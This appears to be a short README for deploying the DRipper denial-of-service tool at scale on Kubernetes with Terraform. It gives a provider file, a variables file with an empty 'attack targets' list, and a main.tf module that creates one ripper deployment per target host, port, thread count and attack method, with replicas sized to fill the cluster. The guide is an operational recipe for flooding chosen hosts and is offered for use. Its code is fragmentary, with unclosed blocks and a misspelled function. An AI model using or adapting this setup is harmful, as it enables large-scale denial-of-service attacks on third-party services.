DRipper batch deploy on Kubernetes via Terraform
I'm assuming you already have a Kubernetes cluster running somewhere, if not - get one!
You need to create a provider.tf
provider "kubernetes" {
config_path = "~/.kube/config"
Copy variables.tf to your folder.
Create terraform.tfvars
# Kubernetes
vcpus_per_node = 4
memory_per_node = 16
node_pool_size = 5
# Attack targets
attack_hosts = [
Then create main.tf
with the following content:
module "ripper_deployment" {
source = "./modules/v1_deployment"
for_each = toset(var.attack_hosts)
deployment_name = "ripper-${indext(var.attack_hosts, each.value)}-deployment"
namespace = "default"
ripper_attack_host = split(",", each.value)[0]
ripper_attack_port = split(",", each.value)[1]
thread_count = split(",", each.value)[2]
attack_method = split(",", each.value)[3]
number_of_replicas = (var.vcpus_per_node / 0.5 * var.node_pool_size) / length(var.attack_hosts)
is a list of comma-separated values: <host>,<port>,<thread_count>,<attack_type>
, for instance:
attack_hosts = [